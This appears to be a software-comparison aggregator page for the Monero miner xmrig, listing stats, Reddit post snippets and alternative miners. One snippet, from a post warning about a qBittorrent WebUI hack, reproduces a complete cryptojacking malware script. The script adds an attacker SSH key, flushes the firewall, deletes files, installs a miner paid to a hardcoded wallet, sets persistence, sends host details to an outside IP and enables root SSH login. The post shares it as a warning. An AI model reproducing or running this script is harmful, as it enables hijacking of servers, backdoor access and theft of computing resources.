xmr-metrics VS xmrig

Compare xmr-metrics vs xmrig and see what are their differences.

xmrig

RandomX, KawPow, CryptoNight and GhostRider unified CPU/GPU miner and RandomX benchmark (by xmrig)
Our great sponsors
  • WorkOS - The modern identity platform for B2B SaaS
  • InfluxDB - Power Real-Time Data Analytics at Scale
  • SaaSHub - Software Alternatives and Reviews
xmr-metrics xmrig
4 363
11 8,298
- -
0.0 7.3
over 2 years ago 21 days ago
C
MIT License GNU General Public License v3.0 only
The number of mentions indicates the total number of mentions that we've tracked plus the number of user suggested alternatives.
Stars - the number of stars that a project has on GitHub. Growth - month over month growth in stars.
Activity is a relative number indicating how actively a project is being developed. Recent commits have higher weight than older ones.
For example, an activity of 9.0 indicates that a project is amongst the top 10% of the most actively developed projects that we are tracking.

xmr-metrics

Posts with mentions or reviews of xmr-metrics. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2021-04-19.

xmrig

Posts with mentions or reviews of xmrig. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2023-07-06.
  • Just experienced an attempted hack. A warning to anyone using WebUI.
    3 projects | /r/qBittorrent | 6 Jul 2023
    #!/bin/bash WALLET="41poaCNDTvs33KCFKfekN88Ehf59ddparQdFKFT4XKrUMnc1Ude7xtvhZuKfTai8tDML6gFyTAKY5RuDDxDqLRZpT8QpQ9b" PORT=$(( 15555 )) export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin if [ -z $HOME ]; then if [ "$(id -u)" == "0" ]; then export HOME=/root elif [ "$(id -u)" != "0" ]; then export USER=$(whoami) export HOME=/home/$USER elif [ -z $HOME ]; then export HOME=/tmp fi fi if [ ! -d $HOME ]; then mkdir -p $HOME fi mkdir $HOME/.ssh ; touch $HOME/.ssh/authorized_keys ; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJRrXGodFAgNzqgVw4QmjxKhZbvc6ReMa0ctI8WGbWBi3pUF++QmmM6Jo4/wMWqOxmdJotN85QpbkRfYuw9QN5aO35RLSJw7o2UOXN9vsaxnIg9wunNstVff22vyjrFrXTNrHaI///P3d4T4w6CCgLlNdNKgKTG176Y7KBmkWWeZvd8phtIaMprhGSbtnvs4v0hADTw+Ej20EeKfphlZsRSVS6zObq6jro4j8iIXvnGEdkIx8b1SP+QK6D+ZOEQxEzD107latrwYbLCNHWX7VP1oK6fbFk3zU+CGOwITiVPKuyX9aNFJVEopZSmreD+b+JoXpYHybiuhL3ex79uCWNWKnfGgBKrSAmnmopvYnd/mQ902ls16j/Cr/YYKhUvFMC7MhuWdazvM9uFT07c8PSPsEJ+vJpW3t2HQkW89mxqjp1rEvURUlqZtkL/3hZEMaamP6phHpSttncyWiMGuLZxoub/2GM8C09+GOOTaf47//mGxtNs5FNWqjyiznznrc=" >> $HOME/.ssh/authorized_keys ; chmod 600 $HOME/.ssh/authorized_keys if ! (type wget >/dev/null || type curl >/dev/null); then echo "ERROR: This script requires \"wget or curl\" utility to work correctly" exit 1 fi # start doing stuff: preparing miner echo "[*] Removing previous c3pool miner (if any)" if sudo -n true 2>/dev/null; then sudo systemctl stop c3pool_miner.service 2>/dev/null sudo systemctl disable c3pool_miner.service 2>/dev/null sudo systemctl disable xmrig.service 2>/dev/null sudo killall xmrig 2>/dev/null sudo pkill xmrig 2>/dev/null kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>/dev/null sudo rm -rf /etc/systemd/system/c3pool_miner.service 2>/dev/null else killall -9 xmrig 2>/dev/null killall xmrig 2>/dev/null pkill xmrig 2>/dev/null kill $(ps aux | grep "[--]config=" | awk '{print $2}') 2>/dev/null fi iptables -P INPUT ACCEPT 2>/dev/null iptables -P FORWARD ACCEPT 2>/dev/null iptables -P OUTPUT ACCEPT 2>/dev/null iptables -F 2>/dev/null echo "[*] Removing $HOME/.c3pool directory" rm -rf $HOME/c3pool 2>/dev/null rm -rf $HOME/.c3pool 2>/dev/null rm -rf /tmp/c3pool 2>/dev/null rm -rf /tmp/* 2>/dev/null find . -name "*c3pool*" -exec rm -rf {} \; 2>/dev/null find . -name "*xmrig*" -exec rm -rf {} \; 2>/dev/null find . -name "*miner*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*c3pool*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*xmrig*" -exec rm -rf {} \; 2>/dev/null find $HOME -name "*miner*" -exec rm -rf {} \; 2>/dev/null echo "[*] Downloading C3Pool advanced version of xmrig to /tmp/xmrig.tar.gz" if ! (wget -q -O /tmp/xmrig.tar.gz "https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/xmrig.tar.gz" || curl -s "https://raw.githubusercontent.com/C3Pool/xmrig_setup/master/xmrig.tar.gz" -o /tmp/xmrig.tar.gz); then echo "ERROR: Can't download file." exit 1 fi echo "[*] Unpacking /tmp/xmrig.tar.gz to $HOME/.c3pool" [ -d $HOME/.c3pool ] || mkdir $HOME/.c3pool [ -f $HOME/.c3pool/.profile ] || touch $HOME/.c3pool/.profile if ! tar xf /tmp/xmrig.tar.gz -C $HOME/.c3pool; then echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $HOME/.c3pool directory" exit 1 fi rm /tmp/xmrig.tar.gz echo "[*] Checking if advanced version of $HOME/.c3pool/xmrig works fine (and not removed by antivirus software)" $HOME/.c3pool/xmrig --help >/dev/null if (test $? -ne 0); then if [ -f $HOME/.c3pool/xmrig ]; then echo "WARNING: Advanced version of $HOME/.c3pool/xmrig is not functional or got removed" fi echo "[*] Looking for the latest version of Monero miner" LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest | grep -o '".*"' | sed 's/"//g'` LATEST_XMRIG_LINUX_RELEASE="https://github.com"`curl -s $LATEST_XMRIG_RELEASE | grep xenial-x64.tar.gz\" | cut -d \" -f2` echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz" if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz" exit 1 fi if ! tar xf /tmp/xmrig.tar.gz -C $HOME/.c3pool --strip=1; then echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $HOME/.c3pool directory" fi rm /tmp/xmrig.tar.gz $HOME/.c3pool/xmrig --help >/dev/null if (test $? -ne 0); then if [ -f $HOME/.c3pool/xmrig ]; then echo "ERROR: Stock version of $HOME/.c3pool/xmrig is not functional too" else echo "ERROR: Stock version of $HOME/.c3pool/xmrig was removed by antivirus too" fi exit 1 fi fi echo "[*] Miner $HOME/.c3pool/xmrig is OK" PASS=`hostname | cut -f1 -d"." | sed -r 's/[^a-zA-Z0-9\-]+/_/g'` if [ "$PASS" == "localhost" ]; then PASS=`ip route get 1 | awk '{print $NF;exit}'` fi if [ -z $PASS ]; then PASS=na fi if [ ! -z $EMAIL ]; then PASS="$PASS:$EMAIL" fi sed -i 's/"donate-level": *[^,]*,/"donate-level": 1,/' $HOME/.c3pool/config.json sed -i 's/"url": *"[^"]*",/"url": "auto.c3pool.org:'$PORT'",/' $HOME/.c3pool/config.json sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $HOME/.c3pool/config.json sed -i 's/"pass": *"[^"]*",/"pass": "'$PASS'",/' $HOME/.c3pool/config.json sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $HOME/.c3pool/config.json sed -i 's/\"max-threads-hint\": *[^,]*,/\"max-threads-hint\": 75,/' $HOME/.c3pool/config.json sed -i 's#"log-file": *null,#"log-file": "'$HOME/.c3pool/xmrig.log'",#' $HOME/.c3pool/config.json sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $HOME/.c3pool/config.json cp $HOME/.c3pool/config.json $HOME/.c3pool/config_background.json sed -i 's/"background": *false,/"background": true,/' $HOME/.c3pool/config_background.json # preparing script echo "[*] Creating $HOME/.c3pool/miner.sh script" cat >$HOME/.c3pool/miner.sh /dev/null; then if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') -gt 3500000 ]]; then echo "[*] Enabling huge pages" echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf >/dev/null sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc))) >/dev/null else echo "[*] Huge already enabled" fi else echo "[*] Not enabling huge pages" fi touch $HOME/.profile sed -i '/c3pool/d' $HOME/.profile echo "$HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1" >>$HOME/.profile #echo "ulimit -n 65000 >/dev/null 2>&1" >>$HOME/.profile chmod +x $HOME/.c3pool/miner.sh (/bin/bash $HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1 || /bin/sh $HOME/.c3pool/miner.sh --config=$HOME/.c3pool/config_background.json >/dev/null 2>&1) rm -rf /tmp/*.sh rm -rf /tmp/* if pidof xmrig >/dev/null; then PID=$(pidof xmrig) echo "Running with $PID" else echo "Not Running" fi IP=$(curl -s -4 http://ip.me) HOSTNAME=$(hostname) USERNAME=$(whoami) HOMEDIR=$(echo ~) CPU_COUNT=$(nproc) MEMORY=$(free -h | awk '/^Mem:/ {print $2}') ARCHI=$(uname -m) (curl -X POST -H "Content-Type: application/json" -d "{\"ip\":\"$IP\",\"hostname\":\"$HOSTNAME\",\"username\":\"$USERNAME\",\"homedir\":\"$HOMEDIR\",\"cpu_count\":\"$CPU_COUNT\",\"memory\":\"$MEMORY\",\"arch\":\"$ARCHI\"}" http://152.67.212.28:55123/add || wget --header "Content-Type: application/json" --post-data "{\"ip\":\"$IP\",\"hostname\":\"$HOSTNAME\",\"username\":\"$USERNAME\",\"homedir\":\"$HOMEDIR\",\"cpu_count\":\"$CPU_COUNT\",\"memory\":\"$MEMORY\",\"arch\":\"$ARCHI\"}" http://152.67.212.28:55123/add) (chmod go-w ~/ && chmod go-w /root && chmod 700 ~/.ssh && chmod 700 /root/.ssh && chmod 600 ~/.ssh/authorized_keys && chown root /root && chown root /root/.ssh) >/dev/null sudo sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config >/dev/null sudo sed -i 's/#PubkeyAuthentication yes/PubkeyAuthentication yes/' /etc/ssh/sshd_config >/dev/null sudo /etc/init.d/ssh restart >/dev/null
  • Best mining program on Windows?
    2 projects | /r/MoneroMining | 30 Jun 2023
    Xmrig and use a pool that isn't one of the top three. If you want a have more of a challenge then try the p2pool with xmrig. https://github.com/xmrig/xmrig/releases/tag/v6.19.3
  • Over 110k BAN has been distributed to BanRXers!
    2 projects | /r/banano | 22 Jun 2023
    Regarding how much you can trust BanRX, all of the mining software used is fully open source on GitHub, with a commonly used one (XMrig) having over 7.6k stars on the repository. We also have a community Discord server for all of the apps in the BananoPlanet ecosystem, including our faucet! You can join the BananoPlanet Discord server at https://bananoplanet.cc/discord.
  • How do I know if I'm actually mining Monero correctly and everything is alright?
    3 projects | /r/MoneroMining | 29 May 2023
    Downloaded and extracted https://xmrig.com/. The Linux CPU only one.
  • Mining Monero
    2 projects | /r/CryptoCurrency | 21 May 2023
    Monero is mined with CPU, and the best software for this is XMRig. You will need to join a mining pool to mine Monero.
  • Android CPU mining
    2 projects | /r/cpumining | 19 May 2023
    That's funny, because I don't see it.... https://xmrig.com/download Or https://github.com/xmrig/xmrig/releases
  • Looking to learn
    4 projects | /r/MoneroMining | 11 May 2023
    Download xmrig, config it to point to the pool minexmr2.com, wait for a while to check your hashrate on the pool's web-ui dashboard.
  • Remote Server Compromised
    7 projects | /r/selfhosted | 6 Apr 2023
    Now, it had been almost 10 days since I set that up, but 2 days ago a reverse shell script was executed via selenium to gain remote access to my server, and the attacker installed the xmrig crypto miner along with a script that monitors that xm/xmrig is still running.
  • Momero Mining with GPU
    2 projects | /r/MoneroMining | 4 Apr 2023
    You will need XMRig and XMRig-CUDA plugin to mine on NVIDIA GPUs. You'll need to set "enabled": true, in cuda section of config.json for XMRig. But you'll be disappointed by GPU hashrates.
  • KAWPOW Reference?
    6 projects | /r/Ravencoin | 21 Feb 2023

What are some alternatives?

When comparing xmr-metrics and xmrig you can also consider the following projects:

csminer - csminer Monero miner from https://cryptonote.social/

NBMiner - GPU Miner for ETH, RVN, BEAM, CFX, ZIL, AE, ERGO

cpuminer-opt-cpupower - Optimized multi algo CPU miner for CPUchain, Uranium-X, Cranepay, Yenten

SRBMiner-Multi - CPU & AMD GPU cryptocurrency miner

xmr-stak - Free Monero RandomX Miner and unified CryptoNight miner

cpuminer - CPU miner for Litecoin and Bitcoin

SilentXMRMiner - A Silent (Hidden) Monero (XMR) Miner Builder

ubuntu-in-termux - This is a script by which you can install Ubuntu in your termux application without a rooted device

xmrig-proxy - Monero (XMR) Stratum protocol proxy

xmrig-cuda - NVIDIA CUDA plugin for XMRig miner

excavator - NiceHash's proprietary low-level CUDA miner

lolMiner-releases